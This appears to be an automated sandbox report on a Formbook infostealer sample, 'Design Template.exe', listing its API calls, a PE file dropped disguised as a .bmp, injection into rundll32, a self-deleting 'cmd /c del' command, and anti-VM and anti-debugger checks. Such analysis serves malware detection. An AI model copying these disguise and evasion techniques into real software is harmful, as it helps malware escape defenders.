Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49B00 NtSetValueKey, 4_2_00A49B00
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A495F0 NtQueryInformationFile, 4_2_00A495F0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49520 NtWaitForSingleObject, 4_2_00A49520
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4AD30 NtSetContextThread, 4_2_00A4AD30
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49560 NtWriteFile, 4_2_00A49560
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A496D0 NtCreateKey, 4_2_00A496D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49610 NtEnumerateValueKey, 4_2_00A49610
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49670 NtQueryInformationProcess, 4_2_00A49670
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49650 NtQueryValueKey, 4_2_00A49650
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49730 NtQueryVirtualMemory, 4_2_00A49730
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4A710 NtOpenProcessToken, 4_2_00A4A710
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49760 NtOpenProcess, 4_2_00A49760
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4A770 NtOpenThread, 4_2_00A4A770
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49770 NtSetInformationFile, 4_2_00A49770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9540 NtReadFile,LdrInitializeThunk, 14_2_044C9540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C95D0 NtClose,LdrInitializeThunk, 14_2_044C95D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9650 NtQueryValueKey,LdrInitializeThunk, 14_2_044C9650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_044C9660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C96D0 NtCreateKey,LdrInitializeThunk, 14_2_044C96D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C96E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_044C96E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9710 NtQueryInformationToken,LdrInitializeThunk, 14_2_044C9710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9FE0 NtCreateMutant,LdrInitializeThunk, 14_2_044C9FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9780 NtMapViewOfSection,LdrInitializeThunk, 14_2_044C9780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9840 NtDelayExecution,LdrInitializeThunk, 14_2_044C9840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_044C9860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_044C9910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C99A0 NtCreateSection,LdrInitializeThunk, 14_2_044C99A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A50 NtCreateFile,LdrInitializeThunk, 14_2_044C9A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9560 NtWriteFile, 14_2_044C9560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9520 NtWaitForSingleObject, 14_2_044C9520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CAD30 NtSetContextThread, 14_2_044CAD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C95F0 NtQueryInformationFile, 14_2_044C95F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9670 NtQueryInformationProcess, 14_2_044C9670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9610 NtEnumerateValueKey, 14_2_044C9610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9760 NtOpenProcess, 14_2_044C9760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CA770 NtOpenThread, 14_2_044CA770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9770 NtSetInformationFile, 14_2_044C9770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CA710 NtOpenProcessToken, 14_2_044CA710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9730 NtQueryVirtualMemory, 14_2_044C9730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C97A0 NtUnmapViewOfSection, 14_2_044C97A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CB040 NtSuspendThread, 14_2_044CB040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9820 NtEnumerateKey, 14_2_044C9820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C98F0 NtReadVirtualMemory, 14_2_044C98F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C98A0 NtWriteVirtualMemory, 14_2_044C98A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9950 NtQueueApcThread, 14_2_044C9950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C99D0 NtCreateProcessEx, 14_2_044C99D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A00 NtProtectVirtualMemory, 14_2_044C9A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A10 NtQuerySection, 14_2_044C9A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A20 NtResumeThread, 14_2_044C9A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9A80 NtOpenDirectoryObject, 14_2_044C9A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9B00 NtSetValueKey, 14_2_044C9B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044CA3B0 NtGetContextThread, 14_2_044CA3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005081B0 NtCreateFile, 14_2_005081B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00508260 NtReadFile, 14_2_00508260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005082E0 NtClose, 14_2_005082E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00508390 NtAllocateVirtualMemory, 14_2_00508390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005081AA NtCreateFile, 14_2_005081AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050825B NtReadFile, 14_2_0050825B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005082DA NtClose, 14_2_005082DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050838A NtAllocateVirtualMemory, 14_2_0050838A
Detected potential crypto function
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434798 2_2_00434798
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042C063 2_2_0042C063
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042572C 2_2_0042572C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00429FD0 2_2_00429FD0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD20A8 4_2_00AD20A8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B090 4_2_00A1B090
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD28EC 4_2_00AD28EC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1002 4_2_00AC1002
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0F900 4_2_00A0F900
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD22AE 4_2_00AD22AE
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3EBB0 4_2_00A3EBB0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACDBD2 4_2_00ACDBD2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD2B28 4_2_00AD2B28
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1841F 4_2_00A1841F
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACD466 4_2_00ACD466
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32581 4_2_00A32581
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1D5E0 4_2_00A1D5E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD25DD 4_2_00AD25DD
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A00D20 4_2_00A00D20
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD2D07 4_2_00AD2D07
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD1D55 4_2_00AD1D55
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD2EF7 4_2_00AD2EF7
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A26E30 4_2_00A26E30
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACD616 4_2_00ACD616
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD1FF1 4_2_00AD1FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454D466 14_2_0454D466
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449841F 14_2_0449841F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04551D55 14_2_04551D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04552D07 14_2_04552D07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04480D20 14_2_04480D20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045525DD 14_2_045525DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449D5E0 14_2_0449D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454D616 14_2_0454D616
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A6E30 14_2_044A6E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04552EF7 14_2_04552EF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04551FF1 14_2_04551FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541002 14_2_04541002
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045528EC 14_2_045528EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B090 14_2_0449B090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045520A8 14_2_045520A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448F900 14_2_0448F900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045522AE 14_2_045522AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04552B28 14_2_04552B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454DBD2 14_2_0454DBD2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BEBB0 14_2_044BEBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050C838 14_2_0050C838
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F8C4B 14_2_004F8C4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F8C50 14_2_004F8C50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F2D90 14_2_004F2D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F2FB0 14_2_004F2FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Design Template.exe Code function: String function: 00422DE8 appears 49 times
Source: C:\Users\user\Desktop\Design Template.exe Code function: String function: 00A0B150 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0448B150 appears 35 times
PE file does not import any functions
Source: Liebert.bmp.2.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: Design Template.exe, 00000004.00000002.329749944.0000000002629000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Design Template.exe
Source: Design Template.exe, 00000004.00000002.329471350.0000000000C8F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Design Template.exe
Uses 32bit PE files
Source: Design Template.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Liebert.bmp.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Liebert.bmp.2.dr Static PE information: Section .text
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@7/1@15/6
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042D194 FindResourceA,LoadResource,LockResource, 2_2_0042D194
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01
Source: C:\Users\user\Desktop\Design Template.exe File created: C:\Users\user~1\AppData\Local\Temp\Liebert.bmp Jump to behavior
Source: Design Template.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Design Template.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: Design Template.exe Virustotal: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\Design Template.exe 'C:\Users\user\Desktop\Design Template.exe'
Source: C:\Users\user\Desktop\Design Template.exe Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Design Template.exe Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe' Jump to behavior
Source: Design Template.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Design Template.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00426369 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00426369
PE file contains sections with non-standard names
Source: Design Template.exe Static PE information: section name: .cdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00422C20 push eax; ret 2_2_00422C4E
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00422DE8 push eax; ret 2_2_00422E06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A5D0D1 push ecx; ret 4_2_00A5D0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044DD0D1 push ecx; ret 14_2_044DD0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_004F4984 push ebx; ret 14_2_004F4985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050B3F2 push eax; ret 14_2_0050B3F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050B3FB push eax; ret 14_2_0050B462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050B3A5 push eax; ret 14_2_0050B3F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050B45C push eax; ret 14_2_0050B462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0050BCBE push ss; ret 14_2_0050BCC5
Source: initial sample Static PE information: section name: .text entropy: 7.31104749099

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\Design Template.exe File created: C:\Users\user\AppData\Local\Temp\Liebert.bmp Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\Design Template.exe File created: C:\Users\user\AppData\Local\Temp\Liebert.bmp Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_004218A0 IsIconic, 2_2_004218A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00421A45 IsIconic,GetWindowPlacement,GetWindowRect, 2_2_00421A45
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00427F30 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA, 2_2_00427F30
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00427780 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC, 2_2_00427780
Source: C:\Users\user\Desktop\Design Template.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Design Template.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Design Template.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000004F85E4 second address: 00000000004F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000004F896E second address: 00000000004F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A36A60 rdtscp 4_2_00A36A60
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Design Template.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Liebert.bmp Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5548 Thread sleep time: -45000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.302749185.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000007.00000002.516979804.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.303489272.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.299098647.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000007.00000002.519851074.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Design Template.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Design Template.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A36A60 rdtscp 4_2_00A36A60
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_004383A8 LdrLoadDll, 2_2_004383A8
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00426369 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00426369
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043AA88 mov eax, dword ptr fs:[00000030h] 2_2_0043AA88
